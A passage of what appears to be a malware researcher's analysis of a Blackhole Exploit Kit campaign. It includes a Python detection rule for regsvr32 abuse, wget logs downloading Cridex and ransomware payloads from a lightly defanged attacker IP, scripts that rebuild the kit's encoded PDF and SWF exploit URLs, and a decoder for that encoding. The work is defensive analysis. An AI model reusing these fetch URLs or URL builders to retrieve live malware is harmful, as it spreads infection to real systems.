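# processes a drive-by exploit chain typically runs inside (browser, Java, Reader, Flash plugin host)
PLUGIN_HOSTS = {"iexplore.exe", "firefox.exe", "chrome.exe", "plugin-container.exe",
                "java.exe", "javaw.exe", "acrord32.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def argv(cmdline):
    """Split a Windows command line, keeping quoted paths with spaces together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def flags(ev):
    reasons = []
    image, parent, args = ev["Image"], ev["ParentImage"], argv(ev["CommandLine"])
    if TEMP_DIR.search(image):
        reasons.append("image runs from a Temp directory")
        if image.lower().endswith(".dll"):
            reasons.append("process image has a .dll extension")
    if basename(image) == "regsvr32.exe":
        silent = any(a.lower() in ("-s", "/s") for a in args[1:])
        temp_dll = any(TEMP_DIR.search(a) for a in args[1:])
        if silent and temp_dll:
            reasons.append("regsvr32 silently registering a DLL from Temp")
    if reasons and basename(parent) in PLUGIN_HOSTS:
        reasons.append("spawned by browser/plugin host " + basename(parent))
    return reasons

def scan(events):
    """Return (index, reasons) for every event matching the chain in the trace."""
    hits = []
    for i, ev in enumerate(events):
        r = flags(ev)
        if r:
            hits.append((i, r))
    return hits

if __name__ == "__main__":
    for i, reasons in scan(EVENTS):
        print(i, EVENTS[i]["CommandLine"])
        for r in reasons:
            print("   -", r)
```

Only the two events that mirror the trace are reported; the installer calling regsvr32 /s on a DLL under Program Files is left alone, which is the kind of distinction a rule built on the regsvr32 name alone would miss.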
  803.  
  804. //============================
  805. // PAYLOADS GO FIRST...
  806. //============================
  807.  
  808. // fetch these sh*ts...
  809.  
  810. --2013-02-18 15:08:46--  h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
  811. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  812.   :
  813. GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
  814. Host: 46.175.224.21:8080
  815. http request sent, awaiting response...
  816.   :
  817. http/1.1 200 OK
  818. Server: nginx/1.0.10
  819. Date: Mon, 18 Feb 2013 06:08:39 GMT
  820. Content-Type: application/x-msdownload
  821. Connection: keep-alive
  822. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  823. Pragma: public
  824. Expires: Mon, 18 Feb 2013 06:08:39 GMT
  825. Cache-Control: must-revalidate, post-check=0, pre-check=0
  826. Cache-Control: private
  827. Content-Disposition: attachment; filename="about.exe"
  828. Content-Transfer-Encoding: binary
  829. Content-Length: 94208
  830.   :
  831. 200 OK
  832. Length: 94208 (92K) [application/x-msdownload]
  833. Saving to: `./about.exe'
  834. 2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
  835.  
  836.  
  837. --2013-02-18 15:07:55--  h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
  838. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  839.   :
  840. GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
  841. Host: 46.175.224.21:8080
  842. http request sent, awaiting response...
  843.   :
  844. h00p/1.1 200 OK
  845. Server: nginx/1.0.10
  846. Date: Mon, 18 Feb 2013 06:07:48 GMT
  847. Content-Type: application/x-msdownload
  848. Connection: keep-alive
  849. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  850. Pragma: public
  851. Expires: Mon, 18 Feb 2013 06:07:48 GMT
  852. Cache-Control: must-revalidate, post-check=0, pre-check=0
  853. Cache-Control: private
  854. Content-Disposition: attachment; filename="readme.exe"
  855. Content-Transfer-Encoding: binary
  856. Content-Length: 279040
  857.   :
  858. 200 OK
  859. Length: 279040 (273K) [application/x-msdownload]
  860. Saving to: `./readme.exe'
  861. 2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
  862.  
  863.  
  864. //Payloads checks...Cridex & ransomware....
  865.  
  866. https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
  867. https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
  868.  
  869.  
  870.  
  871. =============CRACK LOGIC FOR PDF URL==================
  872.  
  873. function x(s){ // each char code of s written in base 33 (e.g. '2' = 50 = "1h"), joined with ':'
  874.   var d = [];
  875.   for (var i = 0; i < s.length; i++){
  876.     var k = (s.charCodeAt(i)).toString(33);
  877.     d.push(k);
  878.   }
  879.  
  880.   return d.join(":");
  881. }
  882.  
  883. var domain="h00p://46.175.224.21:8080";
  884. var pdf ="1k:1d:1f:1d:1g:1d:1f";
  885.  
  886. var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
  887. var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
  888. var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
  889. var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + "&gtaaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
  890.  
  891. var url1 = domain + string1 + pdf;
  892. var url2 = domain + string2 + pdf;
  893. var url3 = domain + string3 + pdf;
  894. var url4 = domain + string4 + pdf;
  895.  
  896. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  897.  
  898.  
  899. // output:
  900.  
  901. h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  902. h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  903. h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  904. h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  905.  
  906.  
  907. //=============CRACK LOGIC FOR SWF URL==================
  908.  
  909. function x(s){ // same encoder as for the PDF urls: char codes in base 33, joined with ':'
  910.   var d = [];
  911.   for (var i = 0; i < s.length; i++){
  912.     var k = (s.charCodeAt(i)).toString(33);
  913.     d.push(k);
  914.   }
  915.  
  916.   return d.join(":");
  917. }
  918.  
  919. var domain="h00p://46.175.224.21:8080";
  920.  
  921. var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") +   "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
  922. var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
  923. var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
  924. var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
  925.            
  926. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  927.  
  928. // output
  929.  
  930. h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  931. h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  932. h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  933. h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
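
// The x() function in the two crack scripts above reproduces the landing page's query encoding: every character code of the plugin string is written in base 33 and the digits are joined with ':'. An added example, not from these notes: the reverse direction in Python, for when a proxy log shows only the encoded query string and you want to read what the client reported. It assumes only the encoding the scripts above show; values that are not base-33 text (such as cbfyrfg or the single letters p and i) are passed through unchanged.

```python
import re
from urllib.parse import parse_qsl

# The 33 digit symbols JavaScript's Number.toString(33) uses.
DIGITS = "0123456789abcdefghijklmnopqrstuvw"

# The first PDF url from the notes, used as sample input.
SAMPLE_PDF_URL = ("h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f"
                  "&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f")

def to_base33(n):
    s = ""
    while True:
        n, r = divmod(n, 33)
        s = DIGITS[r] + s
        if n == 0:
            return s

def encode33(text):
    """Same as the notes' x(): each char code in base 33, joined with ':'."""
    return ":".join(to_base33(ord(c)) for c in text)

def decode33(token):
    """Inverse of x(): '1h:1j:1j:32:1f' -> '244e0'."""
    return "".join(chr(int(t, 33)) for t in token.split(":"))

# one or two base-33 digits per character (char codes below 128 never need more), ':'-separated
ENCODED = re.compile(r"[0-9a-w]{1,2}(?::[0-9a-w]{1,2})*")

def decode_query(url):
    """Decode every query value that is base-33 text and decodes to printable ASCII;
    anything else (random padding words, single letters) is returned as-is."""
    out = {}
    for key, val in parse_qsl(url.split("?", 1)[1], keep_blank_values=True):
        if ENCODED.fullmatch(val):
            plain = decode33(val)
            if all(0x20 <= ord(c) < 0x7f for c in plain):
                out[key] = plain
                continue
        out[key] = val
    return out

if __name__ == "__main__":
    for name, val in decode_query(SAMPLE_PDF_URL).items():
        print(name, "=", val)
```

On the sample url this yields 244e0, bpc, 4fe6139893 and 5.0.1.0 for the four parameters, i.e. the same literals the crack script feeds to x() plus the two values it carried over verbatim.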
  934.  
  935. //=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
  936.  
  937. //pdf
  938.  
  939. --2013-02-18 15:50:22--  h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  940. Connecting to 46.175.224.21:8080... connected.
  941. h00p request sent, awaiting response... 200 OK
  942. Length: 20161 (20K) [application/pdf]
  943. Saving to: `./pdf1.pdf'
  944. 100%[==============================================================================>] 20,161      32.3K/s   in 0.6s
  945. 2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
  946.  
  947. --2013-02-18 15:50:53--  h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  948. Connecting to 46.175.224.21:8080... connected.
  949. h00p request sent, awaiting response... 200 OK
  950. Length: 11194 (11K) [application/pdf]
  951. Saving to: `./pdf2.pdf'
  952. 100%[==============================================================================>] 11,194      32.5K/s   in 0.3s
  953. 2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
  954.  
  955. --2013-02-18 15:51:22--  h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  956. Connecting to 46.175.224.21:8080... connected.
  957. h00p request sent, awaiting response... 200 OK
  958. Length: 20161 (20K) [application/pdf]
  959. Saving to: `./pdf3.pdf'
  960. 100%[==============================================================================>] 20,161      31.6K/s   in 0.6s
  961. 2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
  962.  
  963. --2013-02-18 15:52:02--  h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  964. Connecting to 46.175.224.21:8080... connected.
  965. h00p request sent, awaiting response... 200 OK
  966. Length: 11160 (11K) [application/pdf]
  967. Saving to: `./pdf4.pdf'
  968. 100%[==============================================================================>] 11,160      34.6K/s   in 0.3s
  969. 2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
  970.  
  971.  
  972. // flash....
  973.  
  974.  
  975. --2013-02-18 15:54:34--  h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  976. Connecting to 46.175.224.21:8080... connected.
  977. h00p request sent, awaiting response... 200 OK
  978. Length: 7981 (7.8K) [text/html]
  979. Saving to: `./flash1.swf'
  980. 100%[==============================================================================>] 7,981       26.7K/s   in 0.3s
  981. 2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
  982.  
  983. --2013-02-18 15:54:58--  h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  984. Connecting to 46.175.224.21:8080... connected.
  985. h00p request sent, awaiting response... 200 OK
  986. Length: 1030 (1.0K) [text/html]
  987. Saving to: `./flash2.swf'
  988. 100%[==============================================================================>] 1,030       --.-K/s   in 0s
  989. 2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
  990.  
  991. --2013-02-18 15:55:14--  h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  992. Connecting to 46.175.224.21:8080... connected.
  993. h00p request sent, awaiting response... 200 OK
  994. Length: 7981 (7.8K) [text/html]
  995. Saving to: `./flash3.swf'
  996. 100%[==============================================================================>] 7,981       25.5K/s   in 0.3s
  997. 2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
  998.  
  999.  
  1000. --2013-02-18 15:57:54--  h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  1001. Connecting to 46.175.224.21:8080... connected.
  1002. h00p request sent, awaiting response... 200 OK
  1003. Length: 1030 (1.0K) [text/html]
  1004. Saving to: `./flash4.swf'
  1005. 100%[==============================================================================>] 1,030       --.-K/s   in 0s
  1006. 2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
  1007.  
  1008.  
  1009. =========================
  1010.  
  1011. This BHEK has Geo-IP functions built in (the payload served depends on the requesting IP)...
  1012. Reference: http://ondailybasis.com/blog/?p=1483
  1013.  
  1014. ========================
  1015.  
  1016. ----
  1017. #MalwareMustDie | @unixfreaxjp